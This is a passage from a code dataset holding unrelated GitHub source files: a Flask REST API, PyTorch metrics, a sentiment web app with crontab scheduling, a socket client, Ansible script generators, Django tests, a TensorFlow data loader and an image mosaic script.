Analysed\",fg=\"blue\",font='times 13 bold',command=analyser)\r\nb3.place(x=50,y=230)\r\nb3.config(height=5,width=23)\r\nb4=Button(rootp,text=\"Bored? Play a Game!\",fg=\"blue\",font='times 13 bold',command=game)\r\nb4.place(x=310,y=230)\r\nb4.config(height=5,width=23)\r\nb5=Button(rootp,text=\"EXIT\",fg=\"red\",font='times 10 bold',command=exit)\r\nb5.place(x=260,y=370)\r\nb5.config(height=2,width=10)\r\nrootp.config(bg='light sea green')\r\nLabel(rootp,text='WELCOME',relief='ridge',font='times 28 bold italic',fg='blue').pack()\r\nrootp.mainloop()\r\n","repo_name":"nona02/BOREDUM_BUSTER","sub_path":"MAIN_FILE.py","file_name":"MAIN_FILE.py","file_ext":"py","file_size_in_byte":13584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15048607921","text":"#!/usr/bin/python3\n\"\"\"GET, POST, PUT, DELETE on cities\"\"\"\nfrom api.v1.views import app_views\nfrom models import storage\nfrom datetime import datetime\nfrom flask import jsonify, abort, request\n\n\n@app_views.route('/states/<state_id>/cities', methods=['GET'],\n strict_slashes=False)\ndef get_all_cities_of_state(state_id):\n \"\"\"Retrieves the list of all City objects of a State\"\"\"\n if not storage.get(\"State\", state_id):\n abort(404)\n cities = storage.all(\"City\")\n list_cities = [city.to_dict()\n for city in cities.values()\n if city.state_id == state_id]\n return jsonify(list_cities)\n\n\n@app_views.route('/cities/<city_id>', methods=['GET'], strict_slashes=False)\ndef get_a_city(city_id):\n \"\"\"Retrieves a specific City\"\"\"\n city = storage.get(\"City\", city_id)\n if not city:\n abort(404)\n return jsonify(city.to_dict())\n\n\n@app_views.route('/cities/<city_id>', methods=['DELETE'],\n strict_slashes=False)\ndef delete_a_city(city_id):\n \"\"\"Delete a specific City\"\"\"\n city = storage.get(\"City\", city_id)\n if not city:\n abort(404)\n city.delete()\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/states/<state_id>/cities', methods=['POST'],\n strict_slashes=False)\ndef add_a_city(state_id):\n \"\"\"Add a city related a state to storage\"\"\"\n from models.city import City\n if not storage.get(\"State\", state_id):\n abort(404)\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n if 'name' not in request.get_json():\n abort(400, description=\"Missing name\")\n\n data = request.get_json()\n data['state_id'] = state_id\n obj = City(**data)\n storage.new(obj)\n storage.save()\n return jsonify(obj.to_dict()), 201\n\n\n@app_views.route('/cities/<city_id>', methods=['PUT'], strict_slashes=False)\ndef update_a_city(city_id):\n \"\"\"Update a specific City\"\"\"\n city = storage.get(\"City\", city_id)\n if not city:\n abort(404)\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n\n data = request.get_json()\n static = ['id', 'state_id', 'created_at', 'updated_at']\n data_to_use = {k: v for k, v in data.items() if k not in static}\n k = \"City\" + \".\" + city_id\n if data_to_use:\n for d in data_to_use:\n setattr(storage.all()[k], d, data_to_use.get(d))\n setattr(storage.all()[k], 'updated_at', datetime.utcnow())\n storage.save()\n updated_city = storage.get(\"City\", city_id)\n return jsonify(updated_city.to_dict()), 200\n","repo_name":"Gratien1/AirBnB_clone_v3","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38776672993","text":"\"\"\"Evaluation metrics.\"\"\"\n\nfrom collections import defaultdict\nimport math\nfrom typing import List\n\nimport torch\n\n\nclass Metric:\n score_key = None\n keys = None\n\n def __init__(self, label_map):\n self.label_map = label_map\n self.reset()\n\n def reset(self):\n raise NotImplementedError\n\n def update(self, labels, predictions):\n raise NotImplementedError\n\n def reduce(self):\n raise NotImplementedError\n\n def get(self):\n raise NotImplementedError\n\n\nclass Accuracy(Metric):\n score_key = 'accuracy'\n keys = ['accuracy']\n\n def reset(self):\n self.correct = 0\n self.total = 0\n\n def update(self, labels, predictions):\n self.correct += labels.eq(predictions).sum()\n self.total += labels.size(0)\n\n def reduce(self):\n torch.distributed.reduce(self.correct, 0)\n torch.distributed.reduce(self.total, 0)\n\n def get(self):\n return {'accuracy': self.correct.item() / (self.total + 1e-13)}\n\n\nclass BinaryF1(Metric):\n score_key = 'f1'\n keys = ['precision', 'recall', 'f1']\n\n def reset(self):\n self.tp = 0\n self.fp = 0\n self.fn = 0\n\n def update(self, labels, predictions):\n self.tp += torch.sum(labels.eq(1) & predictions.eq(1))\n self.fp += torch.sum(labels.eq(0) & predictions.eq(1))\n self.fn += torch.sum(labels.eq(1) & predictions.eq(0))\n\n def reduce(self):\n torch.distributed.reduce(self.tp, 0)\n torch.distributed.reduce(self.fp, 0)\n torch.distributed.reduce(self.fn, 0)\n\n def get(self):\n precision = self.tp / (self.tp + self.fp + 1e-13)\n recall = self.tp / (self.tp + self.fn + 1e-13)\n f1 = 2 * precision * recall / (precision + recall + 1e-13)\n return {\n 'precision': precision.item(),\n 'recall': recall.item(),\n 'f1': f1.item(),\n }\n\n\nclass AccuracyF1(Metric):\n score_key = 'f1'\n keys = [*Accuracy.keys, *BinaryF1.keys]\n\n def __init__(self, label_map):\n self.label_map = label_map # TODO(rloganiv): IDK\n self.accuracy = Accuracy(label_map)\n self.f1 = BinaryF1(label_map)\n\n def reset(self):\n self.accuracy.reset()\n self.f1.reset()\n\n def update(self, labels, predictions):\n self.accuracy.update(labels, predictions)\n self.f1.update(labels, predictions)\n\n def reduce(self):\n self.accuracy.reduce()\n self.f1.reduce()\n\n def get(self):\n return {**self.accuracy.get(), **self.f1.get()}\n\n\nclass MacroF1(Metric):\n score_key = 'f1'\n keys = ['precision', 'recall', 'f1']\n\n def reset(self):\n self.tp = torch.zeros(len(self.label_map))\n self.fp = torch.zeros(len(self.label_map))\n self.fn = torch.zeros(len(self.label_map))\n\n def update(self, labels, predictions):\n # TODO(rloganiv): This is kind of hacky, but idk if there's a better\n # way.\n self.tp = self.tp.to(labels.device)\n self.fp = self.fp.to(labels.device)\n self.fn = self.fn.to(labels.device)\n\n for i in range(len(self.label_map)):\n self.tp[i] += torch.sum(labels.eq(i) & predictions.eq(i))\n self.fp[i] += torch.sum(labels.ne(i) & predictions.eq(i))\n self.fn[i] += torch.sum(labels.eq(i) & predictions.ne(i))\n\n def reduce(self):\n torch.distributed.reduce(self.tp, 0)\n torch.distributed.reduce(self.fp, 0)\n torch.distributed.reduce(self.fn, 0)\n\n def get(self):\n precision = self.tp / (self.tp + self.fp + 1e-13)\n recall = self.tp / (self.tp + self.fn + 1e-13)\n f1 = 2 * precision * recall / (precision + recall + 1e-13)\n return {\n 'precision': precision.mean().item(),\n 'recall': recall.mean().item(),\n 'f1': f1.mean().item(),\n }\n\n\nclass AccuracyMacroF1(Metric):\n score_key = 'f1'\n keys = [*Accuracy.keys, *MacroF1.keys]\n\n def __init__(self, label_map):\n self.label_map = label_map # TODO(rloganiv): IDK\n self.accuracy = Accuracy(label_map)\n self.f1 = MacroF1(label_map)\n\n def reset(self):\n self.accuracy.reset()\n self.f1.reset()\n\n def update(self, labels, predictions):\n self.accuracy.update(labels, predictions)\n self.f1.update(labels, predictions)\n\n def reduce(self):\n self.accuracy.reduce()\n self.f1.reduce()\n\n def get(self):\n return {**self.accuracy.get(), **self.f1.get()}\n\n\nclass MatthewsCorrelation(Metric):\n score_key = 'matthews_correlation'\n keys = ['matthews_correlation']\n\n def reset(self):\n self.tp = 0\n self.tn = 0\n self.fp = 0\n self.fn = 0\n\n def update(self, labels, predictions):\n self.tp += torch.sum(labels.eq(1) & predictions.eq(1)).item()\n self.tn += torch.sum(labels.eq(0) * predictions.eq(0)).item()\n self.fp += torch.sum(labels.eq(0) & predictions.eq(1)).item()\n self.fn += torch.sum(labels.eq(1) & predictions.eq(0)).item()\n\n def reduce(self):\n torch.distributed.reduce(self.tp, 0)\n torch.distributed.reduce(self.tn, 0)\n torch.distributed.reduce(self.fp, 0)\n torch.distributed.reduce(self.fn, 0)\n\n\n def get(self):\n numerator = self.tp * self.tn - self.fp * self.fn\n denominator = math.sqrt(\n (self.tp + self.fp) *\n (self.tp + self.fn) * \n (self.tn + self.fp) *\n (self.tn + self.fn)\n )\n return {'matthews_correlation': numerator / (denominator + 1e-13)}\n\n\nMETRICS = {\n 'accuracy': Accuracy,\n 'accuracy-f1': AccuracyF1,\n 'binary-f1': BinaryF1,\n 'macro-f1': MacroF1,\n 'accuracy-macro-f1': AccuracyMacroF1,\n 'matthews-correlation': MatthewsCorrelation,\n}\n","repo_name":"ucinlp/null-prompts","sub_path":"nullprompt/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"35036018173","text":"import csv\nimport copy\nf = open('D:\\REST API file\\\\result\\\\file_category.csv','r',newline='')\nreader = csv.reader(f)\nf1 = open('D:\\REST API file\\\\result\\contextedRelation-all4455006185630056196.csv','r',newline='')\nreader1 = csv.reader(f1)\nf7 = open('D:/REST API file/result/contextedRelation-cate.csv', 'w', newline='')\nwriter7 = csv.writer(f7)\n# 文件名:类别\ndict={}\nfor row in reader:\n list=[]\n list.append(row[2])\n dict[row[0]]=list\nprint(dict)\n\n#version\n# for row in reader1:\n# if row[0] in dict:\n# list=dict[row[0]]\n# if row[4]!=\"1\" or row[1]==\"TRUE\" or row[2]==\"TRUE\" or row[3]==\"TRUE\":\n# list.append(1)\n# list.extend(row[1:5])\n#\n# else:\n# list.append(0)\n# writer7.writerow([row[0]]+list)\n\n# acceptToken\nfor row in reader1:\n # print(row)\n list1 = []\n if row[0] in dict:\n # 深拷贝,直接赋值是浅拷贝,是一种引用,会改变被引用的值https://blog.csdn.net/u010712012/article/details/79754132\n list1 = copy.deepcopy(dict[row[0]])\n list1.extend(row[1:])\n print([row[0]] + list1)\n writer7.writerow([row[0]] + list1)","repo_name":"Nana1209/DataAnalysis","sub_path":"fileHandle/allToCategory.py","file_name":"allToCategory.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37350806025","text":"import os\nimport csv\nfrom flask import Flask, request, render_template, redirect, url_for, send_file\nfrom crontab import CronTab\nfrom model.sentiment import *\nfrom stream import *\nfrom config import *\n\n# set Flask\napp = Flask(__name__)\n\n# set CNN model\nglobal graph\ngraph = tf.get_default_graph()\nvocab, tokenizer, max_length, model = load_variabels()\n# text = 'terima kasih pak!'\n# percent, conclusi = predict_sentiment(text, vocab, tokenizer,max_length, model)\n# print(percent, conclusi)\n\n# Set crontab\ncron = CronTab(user=curr_username)\ncron.remove_all()\ncron.write()\n\n#-------------------- ROUTE ---------------------------------------------------\n# index route\n@app.route(\"/\")\ndef index():\n raw_file = os.listdir(raw_file_directory)\n if(len(cron) > 0):\n is_stream_run = True\n else:\n is_stream_run = False\n return render_template('index.html', raw_file=raw_file, is_stream_run=is_stream_run)\n\n# predict route\n@app.route(\"/predict\")\ndef predict():\n predict_file = os.listdir(predict_file_directory)\n return render_template('predict.html', predict_file=predict_file)\n\n# twitter start stream route\n@app.route(\"/start_stream\", methods=[\"GET\", \"POST\"])\ndef start_stream():\n params = request.form\n if(params == None):\n params = flask.request.args\n if(params != None):\n if(params.get(\"menit\") != \"\"):\n # activate stream \n duration = int(params.get(\"menit\"))\n saveDirectory = dir_aplikasi + \"/\" +raw_file_directory\n begin_stream(duration, saveDirectory)\n\n # activate crontab \n cron.remove_all()\n cron.write()\n duration = str(duration)\n job = cron.new(command= dir_python + ' ' + dir_aplikasi + '/streamArg.py ' + duration + ' ' + dir_aplikasi + \"/\" +raw_file_directory)\n duration = int(duration)\n job.minute.every(duration)\n cron.write()\n \n return redirect(url_for('index'))\n\n# twitter stop stream route\n@app.route(\"/stop_stream\")\ndef stop_stream():\n cron.remove_all()\n cron.write()\n return redirect(url_for('index'))\n\n# Download file route\n@app.route(\"/download/<directory>/<filename>\")\ndef download(directory, filename):\n if(directory == \"raw\"):\n return(send_file(dir_aplikasi + \"/\" + raw_file_directory + \"/\" +filename))\n else:\n return(send_file(dir_aplikasi + \"/\" + predict_file_directory + \"/\" +filename))\n\n# Predict route using CNN Model\n@app.route(\"/predict_txt/<filename>\")\ndef predict_txt(filename):\n input_file = open(raw_file_directory + \"/\" + filename)\n csv_head = ['text', 'conclusi', 'percent']\n csv_body = []\n for line in input_file:\n with graph.as_default():\n percent, conclusion = predict_sentiment(line, vocab, tokenizer, max_length, model)\n csv_line = {}\n csv_line[\"text\"] = line\n csv_line[\"conclusi\"] = conclusion\n csv_line[\"percent\"] = str(percent * 100)\n csv_body.append(csv_line)\n \n input_file.close()\n # os.remove(raw_file_directory + \"/\" + filename)\n\n csv_name = filename + \".csv\"\n try:\n with open(predict_file_directory + \"/\" + csv_name, 'w') as csv_name:\n writer = csv.DictWriter(csv_name, fieldnames=csv_head)\n writer.writeheader()\n for data in csv_body:\n writer.writerow(data)\n except IOError:\n print(\"I/O error\")\n return redirect(url_for('predict'))\n","repo_name":"BimaAdi/twitter-stream-and-cnn-model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15363717114","text":"#! /usr/bin/env python3\n\n# Echo client program\nimport socket, sys, re, time\nsys.path.append(\"../lib\") # for params\nimport params\n\ndef fileDecoder():\n\n\n restore = open(\"rF.archServ\", 'rb')\n\n\n print(\"Decoding recieved file...\")\n metadata = []\n\n for i in range(4):\n metadata.append(restore.readline())\n\n fname1 = str(metadata[0])\n fname2 = str(metadata[2])\n\n fname1 = fname1[1:len(fname1) - 3]\n fname2 = fname2[1:len(fname2) - 3]\n\n undo = open(fname1, 'wb')\n rest = open(fname2, 'wb')\n\n undo.write(restore.read(int(metadata[1])))\n\n rest.write(restore.read())\n print(\"Done.\\n\")\n return\n\nswitchesVarDefaults = (\n (('-s', '--server'), 'server', \"127.0.0.1:50001\"),\n (('-d', '--delay'), 'delay', \"0\"),\n (('-?', '--usage'), \"usage\", False), # boolean (set if present)\n )\n\n\nprogname = \"framedClient\"\nparamMap = params.parseParams(switchesVarDefaults)\n\nserver, usage = paramMap[\"server\"], paramMap[\"usage\"]\n\nif usage:\n params.usage()\n\ntry:\n serverHost, serverPort = re.split(\":\", server)\n serverPort = int(serverPort)\nexcept:\n print(\"Can't parse server:port from '%s'\" % server)\n sys.exit(1)\n\ns = None\nfor res in socket.getaddrinfo(serverHost, serverPort, socket.AF_UNSPEC, socket.SOCK_STREAM):\n af, socktype, proto, canonname, sa = res\n try:\n print(\"creating sock: af=%d, type=%d, proto=%d\" % (af, socktype, proto))\n s = socket.socket(af, socktype, proto)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s = None\n continue\n try:\n print(\" attempting to connect to %s\" % repr(sa))\n s.connect(sa)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s.close()\n s = None\n continue\n break\n\nif s is None:\n print('could not open socket')\n sys.exit(1)\n\ndelay = float(paramMap['delay']) # delay before reading (default = 0s)\nif delay != 0:\n print(f\"sleeping for {delay}s\")\n time.sleep(int(delay))\n print(\"done sleeping\")\n\nchunks = []\nprint(\"Connected. Recieving data...\")\nwhile 1:\n chunk = s.recv(1024)\n\n if len(chunk) == 0:\n break\n\n\n chunks.append(chunk)\n\n\nprint(\"Zero length read. Closing socket...\")\ns.close()\n\nrecievFile = open(\"rF.archServ\", 'wb+')\nrejoint = bytes()\n\nfor i in range( len(chunks)):\n rejoint = rejoint + chunks[i]\n\nrecievFile.write(rejoint)\n\nrecievFile.close()\n\nfileDecoder()\n","repo_name":"utep-cs-systems-courses/os-project3-framing-AleLeeHrtz","sub_path":"servers/reciever.py","file_name":"reciever.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17731853327","text":"''' '''\n\nimport argparse\nimport os\n\nINTRO = '''#!/bin/bash\n\nset -x\n\n'''\n\nPIDS_NEW = '''PIDS=\"\"\n'''\nPIDS_WAIT = '''\nfor PID in $PIDS; do\n wait $PID\ndone\n\n'''\n\nZOOKEEPER = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_zookeeper{org}.yml &> log_autogenstart_zookeeper{org} &\nPIDS=\"$PIDS $!\" \n'''\n\nKAFKA = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_kafka{org}.yml &> log_autogen_start_kafka{org} &\nPIDS=\"$PIDS $!\"\n'''\n\nFABRICCA = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_fabricca{org}.yml &> log_autogen_start_fabricca{org}.log &\nPIDS=\"$PIDS $!\" \n'''\n\nORDERER = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_orderer{org}.yml &> log_autogen_start_orderer{org}.log &\nPIDS=\"$PIDS $!\" \n'''\n\nPEER = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_peer{peer}org{org}.yml &> log_autogen_start_peer{peer}org{org}.log &\nPIDS=\"$PIDS $!\" \n'''\n\ndef start(fp, body, org_count):\n fp.write(PIDS_NEW)\n for org in range(0, org_count):\n fp.write(body.format(org=org))\n fp.write(PIDS_WAIT)\n\n\ndef script_start(peer_count):\n org_count = len(peer_count)\n\n filename = 'autogen_start.sh'\n with open(filename, 'w') as fp:\n fp.write(INTRO)\n start(fp, ZOOKEEPER, org_count)\n start(fp, KAFKA, org_count)\n start(fp, FABRICCA, org_count)\n start(fp, ORDERER, org_count)\n\n fp.write(PIDS_NEW)\n for org in range(0, org_count):\n for peer in range(0, peer_count[org]):\n fp.write(PEER.format(peer=peer, org=org))\n fp.write(PIDS_WAIT)\n os.chmod(filename, 0o755)\n\n\ndef script_template(host, service, vars_file, filename):\n\n template = '''---\n- hosts: {host}\n remote_user: root\n gather_facts: yes\n vars_files:\n - \"{vars_file}\"\n vars:\n service_name: \"{service}\"\n roles:\n - start\n '''\n\n with open(filename, 'w') as ffile:\n ffile.write(template.format(host=host, service=service, vars_file=vars_file))\n\n\ndef script_yml(peer_count, vars_file):\n\n org_count = len(peer_count)\n for org in range(0, org_count):\n script_template('z{}'.format(org), 'zookeeper.service', vars_file, 'autogen_start_zookeeper{}.yml'.format(org))\n script_template('k{}'.format(org), 'kafka.service', vars_file, 'autogen_start_kafka{}.yml'.format(org))\n script_template('fabricca{}'.format(org), 'fabricca.service', vars_file, 'autogen_start_fabricca{}.yml'.format(org))\n script_template('orderer{}'.format(org), 'orderer.service', vars_file, 'autogen_start_orderer{}.yml'.format(org))\n\n script_template('orderer{}'.format(org), 'orderer.service', vars_file, 'autogen_start_orderer{}.yml'.format(org))\n for peer in range(0, peer_count[org]):\n script_template('peer{}org{}'.format(peer, org), 'peer.service', vars_file, 'autogen_start_peer{}org{}.yml'.format(peer, org))\n\n\ndef main():\n '''parse cmdline args and print script'''\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--peer_count',\n nargs='+',\n type=int,\n help='number of peers per org')\n parser.add_argument('-v', '--vars_file', help='ansible vars_file location')\n args = parser.parse_args()\n\n script_yml(args.peer_count, args.vars_file)\n script_start(args.peer_count)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hyperledger-labs/fabric-vms-provision","sub_path":"ansible/utils/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"42902395835","text":"class Penguin:\n def __init__(self, lenArms = 2, lenLegs = 2, numEyes = 2, tail = True, furry = True) -> None:\n self.lenArms = lenArms\n self.lenLegs = lenLegs\n self.numEyes = numEyes\n self.tail = tail\n self.furry = furry\n\n def describe(self):\n print(\"Length of arms:\", self.lenArms)\n print(\"\\nLen of legs:\", self.lenLegs)\n print(\"\\nNumber of eyes:\", self.numEyes)\n print(\"\\nHas a tail:\", self.tail)\n print(\"\\nHas fur:\", self.furry)\n\np = Penguin()\np.describe()\n ","repo_name":"manjushettar/astr-19","sub_path":"asgn1-question4.py","file_name":"asgn1-question4.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10055416467","text":"from tensorflow import keras\nimport tensorflow as tf\nimport numpy as np\n\n\nclass MnistData:\n def __init__(self, config):\n self.config = config\n (x_train_, self.y_train), (x_test_, self.y_test) = keras.datasets.mnist.load_data()\n x_train_ = x_train_ / 255.\n x_test_ = x_test_ / 255.\n self.x_train = x_train_.reshape((-1, 28, 28, 1))\n self.x_test = x_test_.reshape((-1, 28, 28, 1))\n\n self.next_batch(self.config.batch_size)\n\n def next_batch(self, batch_size):\n # train_data\n train_data = tf.data.Dataset.from_tensor_slices((tf.convert_to_tensor(self.x_train, dtype=tf.float32),\n tf.convert_to_tensor(self.y_train, dtype=tf.int64)))\n train_data = train_data.shuffle(60000)\n train_data = train_data.batch(batch_size)\n\n # test_data\n test_data = tf.data.Dataset.from_tensor_slices((tf.convert_to_tensor(self.x_test, dtype=tf.float32),\n tf.convert_to_tensor(self.y_test, dtype=tf.int64)))\n test_data = test_data.batch(batch_size)\n\n # iterator\n iterator = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\n\n self.next_data = iterator.get_next()\n\n # init_op\n self.train_init_op = iterator.make_initializer(train_data)\n self.test_init_op = iterator.make_initializer(test_data)\n\n\n\nif __name__ == '__main__':\n mnist = MnistData('')\n print(mnist.x_train.shape)\n train_init_op, test_init_op = mnist.next_batch(1)\n\n with tf.Session() as sess:\n sess.run(train_init_op)\n train_data, train_label = mnist.next_data\n print(sess.run(train_data).shape)\n print(sess.run(train_label))\n\n","repo_name":"enningxie/Template_for_TensorFlow","sub_path":"data_loader/mnist_data_generator.py","file_name":"mnist_data_generator.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"27984634906","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.test import TestCase\nfrom alerts.events import factories\nfrom events import serializers\n\n\nclass TestSerializers(TestCase):\n\n def test_user_serializer(self):\n dapp = factories.DAppFactory()\n serialized_user = serializers.UserSerializer(dapp.user)\n serialized_dapp = serializers.DAppSerializer(dapp)\n self.assertIsNotNone(serialized_user)\n self.assertEquals(serialized_user.data.get('email'), dapp.user.email)\n self.assertEquals(serialized_dapp.data.get('authentication_code'), dapp.authentication_code)\n\n user_dict = {'email': None}\n dapp_dict = {'name': None, 'authentication_code': dapp.authentication_code, 'user': user_dict}\n\n serialized_dapp_fail = serializers.DAppSerializer(data=dapp_dict)\n serialized_user_fail = serializers.UserSerializer(data=user_dict)\n self.assertFalse(serialized_dapp_fail.is_valid())\n self.assertFalse(serialized_user_fail.is_valid())\n\n dapp_dict['name'] = 'testname'\n dapp_dict['authentication_code'] = 'testcode'\n user_dict['email'] = 'anotheremail@test.com'\n dapp_dict['user'] = user_dict\n\n serialized_dapp_success = serializers.DAppSerializer(data=dapp_dict)\n serialized_user_success = serializers.UserSerializer(data=user_dict)\n\n self.assertTrue(serialized_dapp_success.is_valid())\n self.assertTrue(serialized_user_success.is_valid())\n\n def test_event_serializer(self):\n event_value = factories.EventValueFactory()\n event = event_value.event\n serialized_event = serializers.EventSerializer(event)\n self.assertEquals(serialized_event.data.get('alert'), event.alert.id)\n self.assertEquals(event_value.event.name, serialized_event.data.get('name'))\n\n def test_alert_serializer(self):\n alert = factories.AlertFactory()\n serialized_alert = serializers.AlertSerializer(alert)\n self.assertEquals(serialized_alert.data.get('contract'), alert.contract)\n self.assertIsNotNone(serialized_alert.data.get('dapp').get('authentication_code'))\n self.assertEquals(serialized_alert.data.get('dapp').get('authentication_code'), alert.dapp.authentication_code)\n\n alert_dict = {\n 'dapp': {\n 'name': 'Multisig',\n 'authentication_code': 'testcode',\n 'user': {\n 'email': 'test@test.com'\n }\n },\n 'abi': alert.abi,\n 'contract': alert.contract\n }\n\n self.assertTrue(serializers.AlertSerializer(data=alert_dict).is_valid())\n alert_dict['contract'] = None\n self.assertFalse(serializers.AlertSerializer(data=alert_dict).is_valid())\n\n","repo_name":"Consensys/eth-alerts","sub_path":"alerts/events/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"16749161360","text":"import ImageDB\nfrom PIL import Image\nfrom PIL import ImageEnhance\nimport io\nfrom image_crawler import store_raw_images\nimport base64\nimport time\n\nSCALE= 20\nMAX_SIZE = 20 \n\nstart_time = time.time()\n\n#src_img_path = './tea.jpg'\nsrc_img_path = input(\"Please enter the path to the src img\\n\")\nsrc = src_img_path.rsplit('/',1)[1]\nsrc = src.split('.')[0]\nprint('src is ' + str(src))\n\ndb = ImageDB.db()\ndb.init()\n\n#print(\"The testing crawling may take 20s...\")\n#store_raw_images(\"sky\")\nprint(\"Skipping crawl testing...\")\n\nim = Image.open(src_img_path).convert('LA')\n\n#im.show()\nwidth, height, = im.size\nprint('Original img width ' + str(width) + ' and height ' + str(height))\n\nif(width > MAX_SIZE):\n resize = width//MAX_SIZE\n width=MAX_SIZE\n height=height//resize\nelif (height > MAX_SIZE):\n resize = height//MAX_SIZE\n height = MAX_SIZE\n width = width//resize\n\n\nimm = im.thumbnail((width, height))\npx = im.load() #px is 2d matrix of pixel coordinates\nwidth, height, = im.size\nprint('Resized original img width ' + str(width) + ' and height ' + str(height))\n\ncanvas_width =int(width*SCALE)\ncanvas_height = int(height*SCALE)\nprint('Using scale of 1:20 pixels...')\nprint('Creating new canvas with width ' \n + str(canvas_width) + ' and height ' + str(canvas_height))\n\ncanvas = Image.new('RGB', (canvas_width,canvas_height), (0, 0, 255))\n#canvas.show()\n#print(\"file type \" + str(type(im)))\n\nnum_tiles_needed = width * height\n\nprint(\"Opening \"+ str(num_tiles_needed) + \" testing images...\")\ntiles_selected = db.select_num(num_tiles_needed)\n\ntry:\n for i in range(0, width):\n canvas_x = i*SCALE\n for j in range(0, height):\n canvas_y = j*SCALE \n \n print('px[' +str(i) +',' +str(j)+ ']'+ ' is ' + str(px[i,j]))\n px_l = px[i,j][0]\n px_a = px[i,j][1]\n \n print(\"Selecting pic close to \" + str(px[i,j]))\n \n identifier = j%74\n if identifier == 0:\n identifier = 75\n\n print(str(identifier))\n db.cursor.execute(\"SELECT img FROM imagedb.image WHERE id=%s;\", (identifier,))\n\n img = db.cursor.fetchone()\n img = db.raw_to_img(img[0])\n \n img.thumbnail((SCALE,SCALE))\n greyimg = img.convert('LA')\n #print(str(type(img))) #giving back nontype\n \n \n #brightness lvl here\n \n #factor = (260 - px_l)/200\n factor = px_l/255\n print(str(factor))\n enhancer_object = ImageEnhance.Brightness(greyimg)\n outimg = enhancer_object.enhance(factor) \n\n #pasting here\n canvas.paste(outimg, (canvas_x, canvas_y))\n\nexcept KeyboardInterrupt:\n print('\\nStopping, saving partial image...')\n\nfinally:\n canvas.save('./mosaic_' + str(src) +'.jpg')\n total_time = start_time - time.time()\n #mins = int(total_time//60)\n #seconds = total_time - 60*mins\n #print('\\nTime elapsed: ' + str(mins) +'mins ' + str(seconds) + 's \\n')\n print('\\nTime elapsed: ' + str(total_time)+ 's\\n')\n print('Original image size: ' +str(width) + ' by '+ str(height)+ '\\n')\n print('Collage image size: ' +str(canvas_width) + ' by ' +str(canvas_height) + '\\n')\n canvas.show()","repo_name":"CS3103-proj-mosaicit/MosaicIT","sub_path":"mysql/collaging.py","file_name":"collaging.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4813211623","text":"import os\nimport os.path as osp\n\nimport cv2\nimport torch\nfrom PIL import Image\nimport six\nimport lmdb\nimport pickle\nimport numpy as np\n\nimport torch.utils.data as data\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision.datasets import ImageFolder\n\nimport data_manager\n\nimport os\nfrom PIL import Image\nimport numpy as np\nimport functools\nimport random\n\n\ndef read_image(img_path):\n\t\"\"\"Keep reading image until succeed.\n\tThis can avoid IOError incurred by heavy IO process.\"\"\"\n\tgot_img = False\n\twhile not got_img:\n\t\ttry:\n\t\t\timg = Image.open(img_path).convert('RGB')\n\t\t\tgot_img = True\n\t\texcept IOError:\n\t\t\tprint(\"IOError incurred when reading '{}'. Will redo. Don't worry. Just chill.\".format(img_path))\n\t\t\tpass\n\treturn img\n\n\ndef video_loader(img_paths):\n\tvideo = []\n\tfor image_path in img_paths:\n\t\twith open(image_path, 'rb') as f:\n\t\t\tvalue = f.read()\n\t\tvideo.append(value)\n\treturn video\n\n\ndef produce_out(imgs_path, seq_len, stride):\n\timg_len = len(imgs_path)\n\tframe_indices = list(range(img_len))\n\trand_end = max(0, img_len - seq_len * stride - 1)\n\tbegin_index = random.randint(0, rand_end)\n\tend_index = min(begin_index + seq_len * stride, img_len)\n\tindices = frame_indices[begin_index:end_index]\n\tre_indices = []\n\tfor i in range(0, seq_len * stride, stride):\n\t\tadd_arg = random.randint(0, stride - 1)\n\t\tre_indices.append(indices[i + add_arg])\n\tre_indices = np.array(re_indices)\n\n\tout = []\n\tfor index in re_indices:\n\t\tout.append(imgs_path[int(index)])\n\treturn out\n\n\ndef loads_data(buf):\n\t\"\"\"\n\tArgs:\n\t\tbuf: the output of `dumps`.\n\t\"\"\"\n\treturn pickle.loads(buf)\n\n\nclass DatasetLMDB(Dataset):\n\tdef __init__(self, db_path, 